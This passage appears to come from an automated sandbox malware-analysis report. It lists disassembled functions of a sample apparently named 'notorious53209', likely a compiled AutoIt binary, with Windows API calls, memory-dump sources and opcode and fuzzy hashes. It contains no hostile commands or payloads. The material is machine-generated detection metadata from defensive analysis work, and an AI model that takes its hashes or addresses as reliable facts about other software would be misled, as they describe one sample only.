                                                  • Opcode ID: 54326fe2b1a5034384283e183be0ee2788f369007d8ee1b27896f13866864f90
                                                  • Instruction ID: 09b32e8564802c9eb1a94cf1df3908ab28b4ac67836fdec7814e73cc543c7689
                                                  • Opcode Fuzzy Hash: 54326fe2b1a5034384283e183be0ee2788f369007d8ee1b27896f13866864f90
                                                  • Instruction Fuzzy Hash: 32313971A00B09AFCB18EF2DC484AADB7B6FF48310F248629E819D3714D771B960DB91
                                                  Function 008C00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 9a158eccec642063dd234ea3a097267a8d7baa94926b54e9801203ebf9dfd596
                                                  • Instruction ID: 5dc32ce9481e1ba7690a45d9d65c6e74c50a55d15aec90f1598a7bed84b5b3d2
                                                  • Opcode Fuzzy Hash: 9a158eccec642063dd234ea3a097267a8d7baa94926b54e9801203ebf9dfd596
                                                  • Instruction Fuzzy Hash: AE41E474508341CFDB24DF18C494B1ABBE0FF45358F19899DE89A8B7A2C376E845CB52
                                                  Function 00885B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: dff59d86614113fb2e24bf9b424e8c7434af8d8e6816aa08a9359da40bd240d8
                                                  • Instruction ID: 9fb27e6eabef633c327b8ff8b8944a0d7a89e3383ea51a7dc00c7210b6c05019
                                                  • Opcode Fuzzy Hash: dff59d86614113fb2e24bf9b424e8c7434af8d8e6816aa08a9359da40bd240d8
                                                  • Instruction Fuzzy Hash: 6721DF30A14E0DEFDB10AF55E8856EA7FF8FF20390F21846AE485D1621EB7094E09B46
                                                  Function 00884F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00884D13: FreeLibrary.KERNEL32(00000000,?), ref: 00884D4D
                                                    • Part of subcall function 008A548B: __wfsopen.LIBCMT ref: 008A5496
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884F6F
                                                    • Part of subcall function 00884CC8: FreeLibrary.KERNEL32(00000000), ref: 00884D02
                                                    • Part of subcall function 00884DD0: _memmove.LIBCMT ref: 00884E1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID:
                                                  • API String ID: 1396898556-0
                                                  • Opcode ID: f0f22873633ad7fcfa1707f114d8137a208f6cee9a8c8e25b8c4fb38b38457a4
                                                  • Instruction ID: 3d7cccf1c7c8d265193749d49a8c6ceb1ddeb3bcba7413ef76563b7e19942468
                                                  • Opcode Fuzzy Hash: f0f22873633ad7fcfa1707f114d8137a208f6cee9a8c8e25b8c4fb38b38457a4
                                                  • Instruction Fuzzy Hash: C811C43260070AABCB10FF78D812FAE77A9FF44704F10842DF541E62C1DEB59A059B52
                                                  Function 008C01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 8159194f724b337744dc6799f0378a9053780eb4c4ea629c78dc0cfc7a5928f1
                                                  • Instruction ID: 347d29bf417d0aa8d024b0d94d35c77cb6d2742ee80a74d930a257f499c71cf7
                                                  • Opcode Fuzzy Hash: 8159194f724b337744dc6799f0378a9053780eb4c4ea629c78dc0cfc7a5928f1
                                                  • Instruction Fuzzy Hash: 8B21FF74508341CFDB28EF54C484A1ABBE0FF85744F058969E89A87B61D731E845CB52
                                                  Function 00885D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,00010000,?,00000000), ref: 00885D76
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 08e199c7ba5d5ba3c6f331a27474ae4e417439ccb2b1fc180350a71819120327
                                                  • Instruction ID: 346ec799391c137fd9fee56e92d436cd2725e1ddaa574a1596d4126110cd4c02
                                                  • Opcode Fuzzy Hash: 08e199c7ba5d5ba3c6f331a27474ae4e417439ccb2b1fc180350a71819120327
                                                  • Instruction Fuzzy Hash: 62113631204B059FE3309F15C888B66B7E9FF45764F10C92EE8AACAA50D7B1F945CB60
                                                  Function 00885BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 6c5342daa69b1f4f87fc02efbf90093b039542603be8b47e74d5a7ec244eb41c
                                                  • Instruction ID: 8886a29b19b32408ea2f21149bcf2c38ef83a8e1549cb469c95b6a3bf95393ba
                                                  • Opcode Fuzzy Hash: 6c5342daa69b1f4f87fc02efbf90093b039542603be8b47e74d5a7ec244eb41c
                                                  • Instruction Fuzzy Hash: 4D018FB9600946AFC305EB2DC851D66FBAAFF9A3147148259F819C7702DB70EC21CBE1
                                                  Function 008A4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 008A4AD6
                                                    • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2597487223-0
                                                  • Opcode ID: 0aae02372a1b3f1b3f44026926d6593bd1d6fedc600c63804f0bd2c489d2806c
                                                  • Instruction ID: 77f1670846e49f12499f92f79382e5f2c2f4767c71e9f43659501151c4c24dbf
                                                  • Opcode Fuzzy Hash: 0aae02372a1b3f1b3f44026926d6593bd1d6fedc600c63804f0bd2c489d2806c
                                                  • Instruction Fuzzy Hash: 85F0F431800209DFFF51AFB88C0639F3660FF42325F084114B414EA4D1CBB88921CF62
                                                  Function 00884FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884FDE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: bb8c0e3da593b305ec6edae91c225b3aa35e436d0ad68215ae1cb29cf7f01a9b
                                                  • Instruction ID: ceba0b1cf1c54a5b69a144d6c7e16af6ff6130f42797fa03d4d5873190ca4462
                                                  • Opcode Fuzzy Hash: bb8c0e3da593b305ec6edae91c225b3aa35e436d0ad68215ae1cb29cf7f01a9b
                                                  • Instruction Fuzzy Hash: 38F03072509712CFCB34AF64D494812BBE1FF153293209A3EE2D6C2A11CB329844DF40
                                                  Function 008A09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A09F4
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  • Opcode ID: a58f6fd98879b8a47461ac0592b6d9867c59fecbbb2288d5e79bce2527b0e7f7
                                                  • Instruction ID: 9f7802f6e61f42cb898c992560f9fa3931322216d70243f548296ae21d8c0854
                                                  • Opcode Fuzzy Hash: a58f6fd98879b8a47461ac0592b6d9867c59fecbbb2288d5e79bce2527b0e7f7
                                                  • Instruction Fuzzy Hash: 91E0CD379042285BCB20E65C9C05FFA77EDEF887A0F0401B5FC0CD7309D964AD818691
                                                  Function 008E9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock
                                                  • String ID:
                                                  • API String ID: 2638373210-0
                                                  • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                  • Instruction ID: 955c26bd580cd69d5fc89b99fe78a29d61c66e078036cc17d01dec1604891ac9
                                                  • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                  • Instruction Fuzzy Hash: A9E092B0114B405FD7348A24D8107E373E0FB06315F00081CF2DAC3341EBA6B8818759
                                                  Function 008A2E84 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008A3457: __lock.LIBCMT ref: 008A3459
                                                  • __onexit_nolock.LIBCMT ref: 008A2EA0
                                                    • Part of subcall function 008A2EC8: RtlDecodePointer.NTDLL(?), ref: 008A2EDB
                                                    • Part of subcall function 008A2EC8: RtlDecodePointer.NTDLL ref: 008A2EE6
                                                    • Part of subcall function 008A2EC8: __realloc_crt.LIBCMT ref: 008A2F27
                                                    • Part of subcall function 008A2EC8: __realloc_crt.LIBCMT ref: 008A2F3B
                                                    • Part of subcall function 008A2EC8: RtlEncodePointer.NTDLL(00000000), ref: 008A2F4D
                                                    • Part of subcall function 008A2EC8: RtlEncodePointer.NTDLL(008BB80A), ref: 008A2F5B
                                                    • Part of subcall function 008A2EC8: RtlEncodePointer.NTDLL(00000004), ref: 008A2F67
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                  • String ID:
                                                  • API String ID: 3536590627-0
                                                  • Opcode ID: c29139e797ccafe31a8d1afcdf066b47098acf7bc2cf5744c030dabc409f47dd
                                                  • Instruction ID: 12605870b46d84e7efa42370b84b10c56f899da0c4356d724e4c5e0ed5a21ef0
                                                  • Opcode Fuzzy Hash: c29139e797ccafe31a8d1afcdf066b47098acf7bc2cf5744c030dabc409f47dd
                                                  • Instruction Fuzzy Hash: 7CD0EC71D412099AEB51BBAC890275DBA60BF15732F504145F114E6582CB740A425AA6
                                                  Function 00885DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00885DBF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 23ccb305067742b1285db303903b9de3d759935453c6a3796ae2c76cbeadb786
                                                  • Instruction ID: 42362ae14654dc33df8ccccd1dc978e49bc84892af1af551c9b61a8d46ca79e1
                                                  • Opcode Fuzzy Hash: 23ccb305067742b1285db303903b9de3d759935453c6a3796ae2c76cbeadb786
                                                  • Instruction Fuzzy Hash: 31D0C77465420CBFE710DB80DC46FA9777CD705710F100194FD0456690D6B27E509795
                                                  Function 008A548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction ID: 54902b93528b87b659f4caceff0803e9e4d065a73cd747424abd7c20d63ed2fd
                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction Fuzzy Hash: F5B092B684020C7BEE012E86EC02A593F19AB45678F808020FB0C18562A673A6A0968E
                                                  Function 008C220E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 008C221A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: PathTemp
                                                  • String ID:
                                                  • API String ID: 2920410445-0
                                                  • Opcode ID: 895f6b6f65512ade1d1f8a7807efde0558070d855db76d276f3ac67bddba18f7
                                                  • Instruction ID: 5e520d0c1a9fba1de630ed067b1028069b414e7426b6dec5c1d933e13d7105dd
                                                  • Opcode Fuzzy Hash: 895f6b6f65512ade1d1f8a7807efde0558070d855db76d276f3ac67bddba18f7
                                                  • Instruction Fuzzy Hash: FFC04C704690199FEB15A754CDE5AA8723CFF01705F1040D57145D145199B06B40DE11
                                                  Function 008ED2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000002,00000000), ref: 008ED46A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
